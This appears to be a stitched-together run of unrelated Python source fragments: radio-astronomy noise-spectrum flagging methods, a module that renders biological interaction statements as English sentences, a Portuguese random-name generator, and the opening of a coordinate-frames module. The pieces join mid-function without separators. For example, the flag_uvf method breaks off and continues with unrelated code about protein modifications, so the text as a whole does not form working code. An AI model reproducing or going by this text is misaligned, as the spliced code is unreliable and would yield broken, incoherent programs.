"""An array containing the z-scores of the data in the incoherent noise spectrum."""
self.sig_array = np.ma.copy(self.metric_ms)
"""An array that is initially equal to the z-score of each data point. During flagging,
the entries are assigned according to their z-score at the time of their flagging."""
def mean_subtract(self, freq_slice=slice(None), return_coeffs=False):
"""
Calculates the mean-subtracted spectrum from the regular spectrum. A
spectrum made from a perfectly clean observation is reduced to
z-scores by this operation.
Args:
freq_slice: The frequency slice over which to do the calculation. Usually not
set by the user.
return_coeffs: Whether or not to return the mean/polynomial coefficients
Returns:
MS (masked array): The mean-subtracted data array.
"""
if self.spectrum_type == 'cross':
# This constant is determined by the Rayleigh distribution, which
# describes the ratio of its rms to its mean
C = 4 / np.pi - 1
else:
# This involves another constant that results from the folded normal distribution
# which describes the amplitudes of the auto-pols.
# The cross-pols have Rayleigh distributed amplitudes.
C_ray = 4 / np.pi - 1
C_fold = np.pi / 2 - 1
C_pol_map = {-1: C_fold, -2: C_fold, -3: C_ray, -4: C_ray,
-5: C_fold, -6: C_fold, -7: C_ray, -8: C_ray}
C = np.array([C_pol_map[pol] for pol in self.polarization_array])
if not self.order:
coeffs = np.ma.average(self.metric_array[:, freq_slice], axis=0, weights=self.weights_array[:, freq_slice])
weights_factor = self.weights_array[:, freq_slice] / np.sqrt(C * self.weights_square_array[:, freq_slice])
MS = (self.metric_array[:, freq_slice] / coeffs - 1) * weights_factor
else:
MS = np.zeros_like(self.metric_array[:, freq_slice])
coeffs = np.zeros((self.order + 1, ) + MS.shape[1:])
# Make sure x is not zero so that np.polyfit can proceed without nans
x = np.arange(1, self.metric_array.shape[0] + 1)
# We want to iterate over only a subset of the frequencies, so we need to investigate
y_0 = self.metric_array[:, freq_slice]
# Find which channels are not fully masked (only want to iterate over those)
# This gives an array of channel indexes into the freq_slice
good_chans = np.where(np.logical_not(np.all(y_0.mask, axis=0)))[0]
# Only do this if there are unmasked channels
if len(good_chans) > 0:
# np.ma.polyfit does not take 2-d weights (!!!) so we just do the slow implementation and go chan by chan, pol-by-pol
for chan in good_chans:
for pol_ind in range(self.Npols):
y = self.metric_array[:, chan, pol_ind]
w = self.weights_array[:, chan, pol_ind]
w_sq = self.weights_square_array[:, chan, pol_ind]
# Make the fit
coeff = np.ma.polyfit(x, y, self.order, w=w)
coeffs[:, chan, pol_ind] = coeff
# Do the magic
mu = np.sum([coeff[poly_ind] * x**(self.order - poly_ind)
for poly_ind in range(self.order + 1)],
axis=0)
weights_factor = w / np.sqrt(C * w_sq)
MS[:, chan, pol_ind] = (y / mu - 1) * weights_factor
else:
MS[:] = np.ma.masked
if return_coeffs:
return MS, coeffs
else:
return MS
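For order=0 with uniform weights, the mean-subtraction above reduces to (x / mean - 1) / sqrt(C). A small numpy sketch for a single channel and polarization, using toy amplitudes and the cross-correlation (Rayleigh) constant:

```python
import numpy as np

# Squared ratio of standard deviation to mean for a Rayleigh distribution,
# as used for cross-correlation amplitudes above.
C = 4 / np.pi - 1
x = np.array([1.0, 1.2, 0.8, 1.0])  # toy per-time amplitudes in one channel
w = np.ones_like(x)                 # uniform weights (weights_square == w**2)
mean = np.average(x, weights=w)
ms = (x / mean - 1) * w / np.sqrt(C * w**2)
```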
def mask_to_flags(self):
"""
Propagates the mask to construct flags for the original
(non time-differenced) data. If a time is flagged in the INS, then both
times that could have contributed to that time in the sky-subtraction
step are flagged in the new array.
Returns:
tp_flags (array): The time-propagated flags
"""
# Propagate the flags
shape = list(self.metric_array.shape)
tp_flags = np.zeros([shape[0] + 1] + shape[1:], dtype=bool)
tp_flags[:-1] = self.metric_array.mask
tp_flags[1:] = np.logical_or(tp_flags[1:], tp_flags[:-1])
return tp_flags
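The propagation rule in mask_to_flags can be seen on a 1-D toy mask: a flag at differenced time t flags both original times t and t+1 that contributed to the difference.

```python
import numpy as np

diff_flags = np.array([False, True, False])     # flags on 3 differenced times
tp = np.zeros(len(diff_flags) + 1, dtype=bool)  # flags on 4 original times
tp[:-1] = diff_flags
tp[1:] = np.logical_or(tp[1:], tp[:-1])
```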
def flag_uvf(self, uvf, inplace=False):
"""
Applies flags calculated from mask_to_flags method onto a given UVFlag
object. Option to edit an existing uvf object inplace. Works by
propagating the mask on sky-subtracted data to flags that can be applied
to the original data, pre-subtraction. ORs the flags from the INS
object and the input uvf object.
Args:
uvf: A waterfall UVFlag object in flag mode to apply flags to. Must be
constructed from the original data. Errors if not waterfall,
in flag mode, or time ordering does not match INS object.
inplace: Whether to edit the uvf input inplace or not. Default False.
Returns:
uvf: The UVFlag object in flag mode with the time-propagated flags.
"""
if uvf.mode != 'flag':
raise ValueError("UVFlag object must be in flag mode to write flags from INS object.")
    mod_lst = []
for m in agent.mods:
if m.position is None:
if m.residue is not None:
                residue_str = ist.amino_acids[m.residue]['full_name']
mod_lst.append(residue_str)
else:
mod_lst.append('an unknown residue')
elif m.position is not None and m.residue is None:
mod_lst.append('amino acid %s' % m.position)
else:
mod_lst.append(m.residue + m.position)
agent_str += _join_list(mod_lst)
# Handle activity conditions
if agent.activity is not None:
# Get the modifier specific to the activity type, if any
pre_prefix = \
activity_type_prefix.get(agent.activity.activity_type, '')
if agent.activity.is_active:
prefix = pre_prefix + 'active'
else:
# See if there is a special override for the inactive form
if agent.activity.activity_type in inactivity_type_prefix_override:
pre_prefix = inactivity_type_prefix_override[
agent.activity.activity_type]
prefix = pre_prefix + 'inactive'
agent_str = prefix + ' ' + agent_str
return AgentWithCoordinates(agent_str, agent.name, agent.db_refs)
def english_join(lst):
"""Join a list of strings according to English grammar.
Parameters
----------
lst : list of str
A list of strings to join.
Returns
-------
str
A string which describes the list of elements, e.g.,
"apples, pears, and bananas".
"""
return _join_list(lst, oxford=True)
def _join_list(lst, oxford=True):
"""Join a list of words in a grammatically correct way."""
if len(lst) > 2:
s = ', '.join(lst[:-1])
if oxford:
s += ','
s += ' and ' + lst[-1]
elif len(lst) == 2:
s = lst[0] + ' and ' + lst[1]
elif len(lst) == 1:
s = lst[0]
else:
s = ''
return s
def _assemble_activeform(stmt):
"""Assemble ActiveForm statements into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.agent)
sb = SentenceBuilder()
sb.append(subj_str)
if stmt.is_active:
is_active_str = 'active'
else:
is_active_str = 'inactive'
if stmt.activity == 'activity':
sb.append(' is ')
elif stmt.activity == 'kinase':
sb.append(' is kinase-')
elif stmt.activity == 'phosphatase':
sb.append(' is phosphatase-')
elif stmt.activity == 'catalytic':
sb.append(' is catalytically ')
elif stmt.activity == 'transcription':
sb.append(' is transcriptionally ')
elif stmt.activity == 'gtpbound':
sb.append(' is GTP-bound ')
sb.append(is_active_str)
sb.make_sentence()
return sb
def _assemble_modification(stmt):
"""Assemble Modification statements into SentenceBuilder object."""
sub_str = _assemble_agent_str(stmt.sub)
sb = SentenceBuilder()
if stmt.enz is not None:
enz_str = _assemble_agent_str(stmt.enz)
if _get_is_direct(stmt):
mod_str = ' ' + _mod_process_verb(stmt) + ' '
else:
mod_str = ' leads to the ' + _mod_process_noun(stmt) + ' of '
sb.append_as_sentence([enz_str, mod_str, sub_str])
else:
sb.append_as_sentence([sub_str, ' is ', _mod_state_stmt(stmt)])
if stmt.residue is not None:
if stmt.position is None:
mod_str = ' on ' + ist.amino_acids[stmt.residue]['full_name']
else:
mod_str = ' on ' + stmt.residue + stmt.position
elif stmt.position is not None:
mod_str = ' at position %s' % stmt.position
else:
mod_str = ''
sb.append(mod_str)
sb.make_sentence()
return sb
def _assemble_association(stmt):
"""Assemble Association statements into SentenceBuilder object."""
member_strs = [_assemble_agent_str(m.concept) for m in stmt.members]
sb = SentenceBuilder()
sb.append(member_strs[0])
sb.append(' is associated with ')
sb.append_as_list(member_strs[1:])
sb.make_sentence()
return sb
def _assemble_complex(stmt):
"""Assemble Complex statements into SentenceBuilder object."""
member_strs = [_assemble_agent_str(m) for m in stmt.members]
sb = SentenceBuilder()
sb.append(member_strs[0])
sb.append(' binds ')
sb.append_as_list(member_strs[1:])
sb.make_sentence()
return sb
def _assemble_autophosphorylation(stmt):
"""Assemble Autophosphorylation statements into SentenceBuilder object."""
enz_str = _assemble_agent_str(stmt.enz)
sb = SentenceBuilder()
sb.append(enz_str)
sb.append(' phosphorylates itself')
if stmt.residue is not None:
if stmt.position is None:
mod_str = ' on ' + ist.amino_acids[stmt.residue]['full_name']
else:
mod_str = ' on ' + stmt.residue + stmt.position
else:
mod_str = ''
sb.append(mod_str)
sb.make_sentence()
return sb
def _assemble_regulate_activity(stmt):
"""Assemble RegulateActivity statements into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.subj)
obj_str = _assemble_agent_str(stmt.obj)
if stmt.is_activation:
rel_str = ' activates '
else:
rel_str = ' inhibits '
sb = SentenceBuilder()
sb.append_as_sentence([subj_str, rel_str, obj_str])
sb.make_sentence()
return sb
def _assemble_regulate_amount(stmt):
"""Assemble RegulateAmount statements into SentenceBuilder object."""
obj_str = _assemble_agent_str(stmt.obj)
sb = SentenceBuilder()
if stmt.subj is not None:
subj_str = _assemble_agent_str(stmt.subj)
if isinstance(stmt, ist.IncreaseAmount):
rel_str = ' increases the amount of '
elif isinstance(stmt, ist.DecreaseAmount):
rel_str = ' decreases the amount of '
sb.append_as_sentence([subj_str, rel_str, obj_str])
else:
sb.append(obj_str)
if isinstance(stmt, ist.IncreaseAmount):
sb.append(' is produced')
elif isinstance(stmt, ist.DecreaseAmount):
sb.append(' is degraded')
sb.make_sentence()
return sb
def _assemble_translocation(stmt):
"""Assemble Translocation statements into SentenceBuilder object."""
agent_str = _assemble_agent_str(stmt.agent)
sb = SentenceBuilder()
sb.append_as_sentence([agent_str, ' translocates'])
if stmt.from_location is not None:
sb.append_as_sentence([' from the ', stmt.from_location])
if stmt.to_location is not None:
sb.append_as_sentence([' to the ', stmt.to_location])
sb.make_sentence()
return sb
def _assemble_gap(stmt):
"""Assemble Gap statements into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.gap)
obj_str = _assemble_agent_str(stmt.ras)
sb = SentenceBuilder()
sb.append_as_sentence([subj_str, ' is a GAP for ', obj_str])
sb.make_sentence()
return sb
def _assemble_gef(stmt):
"""Assemble Gef statements into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.gef)
obj_str = _assemble_agent_str(stmt.ras)
sb = SentenceBuilder()
sb.append_as_sentence([subj_str, ' is a GEF for ', obj_str])
sb.make_sentence()
return sb
def _assemble_conversion(stmt):
"""Assemble a Conversion statement into SentenceBuilder object."""
reactants = [_assemble_agent_str(r) for r in stmt.obj_from]
products = [_assemble_agent_str(r) for r in stmt.obj_to]
sb = SentenceBuilder()
if stmt.subj is not None:
subj_str = _assemble_agent_str(stmt.subj)
sb.append(subj_str)
sb.append(' catalyzes the conversion of ')
sb.append_as_list(reactants)
sb.append(' into ')
sb.append_as_list(products)
else:
sb.append_as_list(reactants)
sb.append(' is converted into ')
sb.append_as_list(products)
sb.make_sentence()
return sb
def _assemble_influence(stmt):
"""Assemble an Influence statement into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.subj.concept)
obj_str = _assemble_agent_str(stmt.obj.concept)
sb = SentenceBuilder()
# Note that n is prepended to increase to make it "an increase"
if stmt.subj.delta.polarity is not None:
subj_delta_str = ' decrease' if stmt.subj.delta.polarity == -1 \
else 'n increase'
sb.append_as_sentence(['a', subj_delta_str, ' in ', subj_str])
else:
sb.append(subj_str)
sb.append(' causes ')
if stmt.obj.delta.polarity is not None:
obj_delta_str = ' decrease' if stmt.obj.delta.polarity == -1 \
else 'n increase'
sb.append_as_sentence(['a', obj_delta_str, ' in ', obj_str])
else:
sb.append(obj_str)
sb.make_sentence()
return sb
def _make_sentence(txt):
"""Make a sentence from a piece of text."""
# Make sure first letter is capitalized
    txt = txt.strip(' ')
    if not txt:
        return txt
    txt = txt[0].upper() + txt[1:] + '.'
return txt
def _get_is_direct(stmt):
"""Return True if there is any evidence that the statement is direct.
If any of the evidences associated with the statement
indicates a direct interaction then we assume the interaction
is direct. If there is no evidence for the interaction being indirect
then we default to direct.
"""
any_indirect = False
for ev in stmt.evidence:
if ev.epistemics.get('direct') is True:
return True
elif ev.epistemics.get('direct') is False:
# This guarantees that we have seen at least
# some evidence that the statement is indirect
any_indirect = True
if any_indirect:
return False
return True
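The directness heuristic above can be exercised in isolation with stub evidence objects. This is a standalone sketch (`SimpleNamespace` stands in for real evidence objects), not the module's API:

```python
from types import SimpleNamespace

def get_is_direct(evidences):
    # Any evidence explicitly marked direct wins immediately; a direct=False
    # marks the statement indirect; with no epistemic information at all we
    # default to direct.
    any_indirect = False
    for ev in evidences:
        if ev.epistemics.get('direct') is True:
            return True
        elif ev.epistemics.get('direct') is False:
            any_indirect = True
    return not any_indirect
```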
def _get_is_hypothesis(stmt):
"""Return True if there is only evidence that the statement is hypothetical.
If all of the evidences associated with the statement
indicate a hypothetical interaction then we assume the interaction
is hypothetical.
"""
    for ev in stmt.evidence:
        # A single piece of non-hypothetical evidence makes the statement
        # not hypothetical overall.
        if ev.epistemics.get('hypothesis') is not True:
            return False
    return True
def _get_is_hypothesis_adverb(stmt):
"""Return the string associated with a statement being hypothetical."""
if _get_is_hypothesis(stmt):
return ' hypothetically '
else:
return ''
def _mod_process_verb(stmt):
# Example: Phosphorylation -> phosphorylates
mod_name = stmt.__class__.__name__.lower()
return statement_present_verb(mod_name)
def _mod_process_noun(stmt):
# Example: Phosphorylation -> phosphorylation
mod_name = stmt.__class__.__name__.lower()
return mod_name
def _mod_state_stmt(stmt):
# Example: Phosphorylation -> phosphorylated
mod_name = stmt.__class__.__name__.lower()
return statement_passive_verb(mod_name)
def _mod_state_str(s):
return statement_passive_verb(s)
def statement_passive_verb(stmt_type):
"""Return the passive / state verb form of a statement type.
Parameters
----------
stmt_type : str
The lower case string form of a statement type, for instance,
'phosphorylation'.
Returns
-------
str
The passive/state verb form of a statement type, for instance,
'phosphorylated'.
"""
override = {
'complex': 'bound',
'regulateamount': 'amount regulated',
'decreaseamount': 'decreased',
'increaseamount': 'increased',
'gap': 'GAP-regulated',
'gef': 'GEF-regulated',
'gtpactivation': 'GTP-activated',
'influence': 'influenced',
'event': 'happened',
'conversion': 'converted',
'modification': 'modified',
'addmodification': 'modified',
'removemodification': 'unmodified',
'regulateactivity': 'activity regulated',
}
    return override.get(stmt_type, stmt_type[:-3] + 'ed')
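The fallback rule replaces a trailing "-ion" with "-ed"; a minimal standalone sketch (using only a subset of the override table above):

```python
override = {'complex': 'bound', 'increaseamount': 'increased'}

def passive(stmt_type):
    # Overrides first; otherwise apply the "-ion" -> "-ed" suffix rule.
    return override.get(stmt_type, stmt_type[:-3] + 'ed')
```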
def statement_present_verb(stmt_type):
"""Return the present verb form of a statement type.
Parameters
----------
stmt_type : str
The lower case string form of a statement type, for instance,
'phosphorylation'.
Returns
-------
str
The present verb form of a statement type, for instance,
'phosphorylates'.
"""
override = {
'complex': 'binds',
'regulateamount': 'regulates the amount of',
'increaseamount': 'increases the amount of',
'decreaseamount': 'decreases the amount of',
'gef': 'acts as a GEF for',
'gap': 'acts as a GAP for',
'inhibition': 'inhibits',
'gtpactivation': 'activates when bound to GTP',
'regulateactivity': 'regulates the activity of',
'activeform': 'has active form',
'conversion': 'converts',
'influence': 'influences',
'modification': 'modifies',
'addmodification': 'adds a modification to',
'removemodification': 'removes a modification of',
'selfmodification': 'modifies itself',
'event': 'happens'
}
    return override.get(stmt_type, stmt_type[:-3] + 'es')
def statement_base_verb(stmt_type):
"""Return the base verb form of a statement type.
Parameters
----------
stmt_type : str
        The lower case string form
import random
from dataclasses import dataclass
from typing import Any, Callable, cast, List, Sequence, TypeVar, Union
T = TypeVar('T')
c_str = Callable[[], str]
S = Union[str, c_str]
def is_function(x: Any) -> bool:
    return callable(x)
def random_element(*itens: T) -> T:
    return random.choice(itens)
def resolve_s(i: S) -> str:
if is_function(i):
f: c_str = cast(c_str, i)
return f()
    if isinstance(i, str):
        return i
    raise TypeError(f"cannot resolve {i!r} to a string")
def up(item: S) -> c_str:
def inner() -> str:
x: str = resolve_s(item)
return x[0].upper() + x[1:]
return inner
def choice_s(*itens: S) -> c_str:
def inner() -> str:
while True:
x: str = resolve_s(random_element(*itens))
            if x != '':
                return x
return inner
def choice_s_epsilon(*itens: S) -> c_str:
def inner() -> str:
return resolve_s(random_element(*itens))
return inner
def seq_s(*itens: S) -> c_str:
def inner() -> str:
out: str = ""
for item in itens:
s: str = resolve_s(item)
out += s
return out
return inner
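The combinators above build lazy string generators that are only sampled when called. A simplified standalone sketch of the same idea (the names `choice` and `seq` are illustrative, not the module's):

```python
import random

def choice(*items):
    # Simplified choice_s: defer the random pick until call time.
    def inner():
        picked = random.choice(items)
        return picked() if callable(picked) else picked
    return inner

def seq(*items):
    # Simplified seq_s: concatenate parts, resolving callables lazily.
    def inner():
        return ''.join(i() if callable(i) else i for i in items)
    return inner

first = choice('Ana', 'Bruno')
full_name = seq(first, ' ', choice('da Silva', 'dos Santos'))
name = full_name()
```

Each call to `full_name()` can yield a different combination, because the random choices happen inside `inner`, not when the generator is built.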
nome_masculino: c_str = choice_s(
"Abílio", "Ademar", "Adílson", "Adônis", "Adriano", "Aécio", "Alan", "Albano", "Alberto", "Albino", "Aldo", "Alessandre", "Alex", "Alexandre", "Alfredo", "Ali", "Alisson", "Aloísio", "Altair", "Altino", "Álvaro", "Amarildo", "Anakin", "Anderson", "André", "Ângelo", "Antônio", "Armando", "Arnaldo", "Artur", "Arthur", "Augusto", "Aurélio", "Áureo", "Avelino", "Ayrton",
"Baltazar", "Barnabé", "Bartolomeu", "Batista", "Benedito", "Benjamin", "Bento", "Bernardo", "Beto", "Bóris", "Breno", "Bruno",
"Caio", "Camilo", "Carlos", "Cauê", "Celso", "César", "Charles", "Chico", "Cícero", "Cirilo", "Ciro", "Cléber", "Cleberson", "Cristiano",
"Damião", "Daniel", "Danilo", "Dante", "Dário", "Davi", "David", "Décio", "Demilson", "Denis", "Diego", "Diogo", "Dionísio", "Domingos",
"Ederson", "Edinaldo", "Edivaldo", "Edson", "Edu", "Eduardo", "Elano", "Elias", "Eliel", "Elói", "Emanoel", "Emílio", "Eric", "Estevão", "Eugênio", "Eustáquio", "Everaldo", "Everton", "Ezequiel",
"Fabiano", "Fábio", "Fabrício", "Fagner", "Felipe", "Félix", "Filipe", "Fernando", "Flávio", "Francisco", "Fred", "Frederico",
"Gabriel", "Geraldo", "Gilberto", "Giovanni", "Giuseppe", "Gilmar", "Gilson", "Guilherme", "Gustavo",
"Hamilton", "Heitor", "Helder", "Hélio", "Henrique", "Hércules", "Heron", "Hildebrando", "Hilton", "Hugo", "Humberto",
"Iago", "Igor", "Inácio", "Isaías", "Isac", "Ismael", "Israel", "Itamar", "Ivan",
"Jacinto", "Jack", "Jackson", "Jair", "Jairo", "Jânio", "Jason", "Jardel", "Jaziel", "Jean", "Jeferson", "Jesus", "João", "João", "João", "João", "Joaquim", "Joel", "Jonas", "Jonathan", "Jonathas", "Jorge", "José", "José", "José", "Josiel", "Juan", "Júlio", "Juliano", "Junior",
"Karl", "Kauê", "Kevin", "Kim",
"Laércio", "Laerte", "Leandro", "Leo", "Leonardo", "Leopoldo", "Lino", "Luan", "Lucas", "Lúcio", "Luciano", "Luigi", "Luís", "Luiz", "Luke",
"Manoel", "Manuel", "Marcelo", "Marciano", "Márcio", "Marco", "Marcos", "Mariano", "Mário", "Marlon", "Martin", "Martinho", "Mateus", "Matheus", "Maurício", "Max", "Micael", "Michel", "Miguel", "Mike", "Milton", "Moacyr", "Moisés", "Murilo",
"Nathan", "Nelson", "Ney", "Nicolas", "Nicolau", "Nilo", "Nilton", "Nivaldo",
"Olavo", "Oliver", "Omar", "Orlando", "Oséas", "Osório", "Osvaldo", "Otaviano", "Otávio", "Otto",
"Pablo", "Patrick", "Paulo", "Paulo", "Pedro", "Plínio",
"Quico", "Quirino",
"Rafael", "Raí", "Ramon", "Raul", "Reginaldo", "Reinaldo", "Renato", "Ricardo", "Ricardo", "Rivaldo", "Robert", "Roberto", "Roberval", "Robson", "Rodrigo", "Rodrigo", "Rodolfo", "Roger", "Rogério", "Romildo", "Ronaldo",
"Samuel", "Sandro", "Saulo", "Sebastião", "Sérgio", "Severino", "Silvair", "Sílvio", "Simão",
"Táles", "Tiago", "Thiago", "Tomáz", "Toninho", "Túlio",
"Uribe",
"Valter", "Victor", "Vinícius", "Vitor",
"Wagner", "Wally", "Walter", "Washington", "Wellington", "Wesley", "Willian", "Wilson",
"Xavier", "Xerxes",
"Yuri",
"Zeca"
)
nome_feminino: c_str = choice_s(
"Abigail", "Adriana", "Adrielle", "Alana", "Albina", "Alessandra", "Aline", "Amália", "Amanda", "Amélia", "Ana", "Ana", "Ana", "Ana", "Ana", "Anna", "Anne", "Andréia", "Andressa", "Ângela", "Angélica", "Aparecida", "Ariana", "Ariel", "Arilda", "Arlete",
"Bárbara", "Beatriz", "Bella", "Berenice", "Bernadete", "Bete", "Bianca", "Brenda", "Bruna",
"Camila", "Carla", "Cármen", "Carolina", "Caroline", "Cássia", "Catarina", "Cecília", "Celeste", "Célia", "Celina", "Charlene", "Christie", "Cibele", "Cícera", "Cíntia", "Clara", "Clarice", "Cláudia", "Cleuza", "Clotilde", "Cristiane", "Cristina",
"Damares", "Daiane", "Daniela", "Danielle", "Dara", "Denise", "Diana", "Dilma", "Dina",
"Ediane", "Edilene", "Eduarda", "Elaine", "Eleonora", "Eleriane", "Eliane", "Elisa", "Elizabete", "Elisete", "Eliomar", "Elisângela", "Eloá", "Érica", "Eulália", "Eunice", "Eva", "Evelyn",
"Fabiana", "Fabíola", "Fátima", "Fernanda", "Felícia", "Flávia", "Flaviana", "Francielle",
"Gabriela", "Gabrielle", "Genir", "Gigi", "Gilmara", "Gisele", "Gislaine", "Graziele", "Guiomar",
"Helena", "Hellen", "Heloísa", "Hilda",
"Isabel", "Isabela", "Ingrid", "Isaiane", "Ísis", "Itamara", "Ivanete", "Ivete", "Ivone",
"Janaína", "Jandira", "Janete", "Jaqueline", "Jeniffer", "Jenny", "Jéssica", "Joelma", "Josiane", "Josilda", "Joyce", "Júlia", "Juliana", "Jussara",
"Karin", "Karina", "Kátia", "Kelly", "Keyla", "Kiara",
"Laila", "Laís", "Lana", "Lara", "Larissa", "Laura", "Léia", "Leila", "Leonara", "Lena", "Leni", "Liane", "Lidiane", "Lígia", "Lili", "Lilian", "Lina", "Lisa", "Lívia", "Luara", "Lúcia", "Luciana", "Luiza", "Luzia", "Luzimara", "Luzinete",
"Madalena", "Magali", "Maíra", "Maísa", "Manuela", "Mara", "Marcela", "Márcia", "Marciane", "Marcielle", "Margarete", "Margarida", "Maria", "Maria", "Maria", "Maria", "Maria", "Maria", "Mariana", "Marielle", "Marilúcia", "Marina", "Marlene", "Marli", "Marta", "Matilde", "Mayara", "Mayra", "Meire", "Mel", "Melanie", "Melissa", "Michele", "Mikaella", "Milene", "Mirela", "Mirian", "Mônica", "Monique",
"Nádia", "Nair", "Natália", "Nayara", "Neila", "Nicole", "Núbia",
"Olga", "Olímpia", "Olívia", "Otávia",
"Patrícia", "Patrícia", "Paula", "Paula", "Paula", "Paulínia", "Priscila", "Poliana",
"Quênia", "Quésia", "Quitéria",
"Rafaela", "Raiane", "Raíssa", "Raquel", "Rebeca", "Regina", "Renata", "Rita", "Roberta", "Rosa", "Rosana", "Rosângela", "Rose", "Roseli", "Rosilda", "Rosimeire", "Rute",
"Sabrina", "Samanta", "Samara", "Sâmia", "Samila", "Sandra", "Sara", "Selena", "Selma", "Sheila", "Shirley", "Simone", "Sílvia", "Solange", "Sônia", "Soraya", "Suellen", "Suely", "Susan", "Suzana", "Suzanne", "Suzy",
"Tábata", "Tânia", "Taís", "Tainá", "Tainara", "Talita", "Tatiana", "Tatiane", "Telma", "Teresa", "Terezinha", "Thaís", "Thaíssa", "Tina",
"Úrsula",
"Valdirene", "Valéria", "Valeska", "Valquíria", "Vanda", "Vanessa", "Vânia", "Velma", "Vera", "Verônica", "Vitória", "Violeta", "Vívian", "Viviane",
"Walderice", "Wanda", "Wendy", "Wilma",
"Xilena",
"Yasmin", "Yeda", "Yolanda",
"Zara", "Zenaide", "Zilda", "Zuleide", "Zulmira"
)
sobrenome_comum: c_str = choice_s(
"de Barbosa", "Gomes", "de Oliveira", "de Pereira", "dos Santos", "dos Santos", "de Souza", "de Souza", "da Silva", "da Silva", "da Silva", "da Silva"
)
sobrenome_incomum: c_str = choice_s(
"de Abreu", "de Aguiar", "de Albuquerque", "de Alcântara", "de Alencar", "de Almeida", "de Alvarenga", "de Álvares", "de Alves", "de Alvim", "do Amaral", "do Amazonas", "de Amorim", "de Andrade", "de Angola", "de Antunes", "de Arantes", "de Araújo", "de Arruda", "de Assis", "de Assunção", "de Ayres", "de Azevedo",
"Bahia", "Banhos", "de Barboza", "de Barros", "Barroso", "de Bezerra", "de Braga", "de Bragança", "de Brandão", "Brasil", "de Brito", "de Britto", "Borba", "de Borges", "Branco", "Buarque", "de Bueno",
"de Cabral", "de Camargo", "Câmara", "de Campos", "de Cardoso", "de Cardozo", "de Carvalho", "Castelo", "<NAME>", "de Castro", "Cavalcante", "de Cerqueira", "de Chaves", "de Coelho", "da Conceição", "da Costa", "Coutinho", "Couto", "da Cruz", "da Cunha",
"d'Ávila", "Dias", "de Diniz", "de Drummond", "de Duarte", "Duque", "Dutra",
"da Encarnação", "Espada", "de Espanha", "do Espírito Santo", "Estrada",
"de Farias", "de Ferreira", "de Fernandes", "de Ferraz", "de Figueira", "de Figueiredo", "de Fonseca", "Fontes", "Fortes", "de Fraga", "Fragoso", "de França", "Franco", "Freire", "de Freitas", "Frias",
"da Gama", "de Garcia", "de Gimenes", "de Godoy", "Góis", "de Gonçalves", "da Graça", "Guedes", "Guerra", "de Guimarães", "de Gusmão", "de Gusmões", "Gutierrez",
"Herrera", "de Holanda",
"de Iglesias", "Igreja",
"Jangada", "Jardim", "de Jesus", "de Junqueira",
"Klein",
"de Lacerda", "de Leão", "de Leite", "de Lemes", "de Lemos", "de Lima", "de Linhares", "de Lins", "da Lira", "de Lisboa", "Lopes", "da Luz",
"de Macedo", "de Machado", "Maciel", "de Madureira", "de Magalhães", "de Maia", "de Malta", "do Maranhão", "Marinho", "Marques", "de Martins", "Martinez", "da Mata", "de Matos", "de Medeiros", "de Meireles", "de Melo", "de Mello", "Mendes", "de Mendonça", "de Menezes", "Mercado", "Milani", "Mineiro", "de Miranda", "de Monteiro", "de Morais", "de Moreira", "Moreno", "de Moura", "Mourão", "de Munhoz", "de Muniz",
"do Nascimento", "Naves", "Negrão", "das Neves", "da Nóbrega", "de Nogueira", "de Noronha", "de Novais", "Nunes",
"de Oliva", "de Ortega", "de Ortiz", "de Osório",
"de Pacheco", "de Padilha", "Paim", "da Paixão", "de Paiva", "de Palhares", "da Paraíba", "do Paraná", "de Paranhos", "de Parreira", "de Pascoal", "de Paula", "da Paz", "de Peixoto", "Penedo", "de Peres", "Pimenta", "de Pimentel", "Pinhão", "dos Pinhais", "de Pinheiro", "do Piauí", "Pinto", "Pires", "Portugal", "do Prado", "Prates", "Preto",
"de Queiroz",
"de Ramos", "Rangel", "dos Reis", "de Rezende", "Ribeiro", "do Rio", "da Rocha", "Rodrigues", "Rosa", "Rosatto", "Rossi",
"de Sá", "de Sales", "de Salgado", "de Salvador", "de Sampaio", "Sanches", "de Santana", "de Santo Antônio", "de São Pedro", "Schmidt", "Schneider", "Seixas", "da Serra", "de Silveira", "de Simões", "de Siqueira", "de Soares", "de Sobral", "Souto",
"de Tavares", "de Teixeira", "Teles", "de Torquato", "Trevisan", "de Trindade", "Tristão", "de Toledo", "Torres", "de Tozetto",
"de Uchôa",
"do Vale", "Valente", "Valverde", "de Vargas", "Vasco", "de Vasconcelos", "Vaz", "de Viana", "de Vieira",
"Weber", "Weiss", "Werner",
"Ximenes",
#Y
#Z
)
def remove_de(nome: str) -> str:
    i: int = nome.find(" ")
    if i == -1 or nome[0:i] not in ["de", "da", "do", "das", "dos"]:
        return nome
    return nome[i + 1:]
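A quick standalone sketch of the behavior the name `remove_de` suggests (stripping a leading Portuguese particle from a surname); the name `remove_particle` is illustrative only:

```python
def remove_particle(nome):
    # Drop a leading particle ("de", "da", "do", "das", "dos"), if present.
    i = nome.find(" ")
    if i == -1 or nome[:i] not in ("de", "da", "do", "das", "dos"):
        return nome
    return nome[i + 1:]
```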
def sobrenome_normal() -> str:
nome: str = choice_s(sobrenome_comum, sobrenome_incomum, sobrenome_incomum, sobrenome_incomum)()
return choice_s(nome, remove_de(nome))()
def sobrenome_random_japones() -> str:
silaba_japones: c_str = choice_s(
"a", "i", "u", "e", "o",
"ka", "ki", "ku", "ke", "ko",
"sa", "shi", "su", "se", "so",
"ta", "chi", "tsu", "te", "to",
"na", "ni", "nu", "ne", "no",
"ha", "hi", "fu", "he", "ho",
"ma", "mi", "mu", "me", "mo",
"ya", "yu", "yo",
"ra", "ri", "ru", "re", "ro",
"wa", "wo",
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""
Provides a set of coordinate frames.
----
.. include license and copyright
.. include:: ../include/copy.rst
----
.. include common links, assuming primary doc root is up one directory
.. include:: ../include/links.rst
"""
import numpy
from scipy import linalg
class SemiMajorAxisCoo:
r"""
Calculate the semi-major axis coordinates given a set of input
parameters following :math:`{\mathbf x} = {\mathbf A}^{-1}\ {\mathbf
b}`, where
.. math::
{\mathbf A} = \left[
\begin{array}{rrrrrr}
1 & 0 & 0 & 0 & 0 & 0 \\
0 & 1 & 0 & 0 & 0 & 0 \\
\cos\psi & \sin\psi & -1 & 0 & 0 & 0 \\
-\sin\psi & \cos\psi & 0 & -1 & 0 & 0 \\
0 & 0 & \sin\phi_0 & \cos\phi_0 & -1 & 0 \\
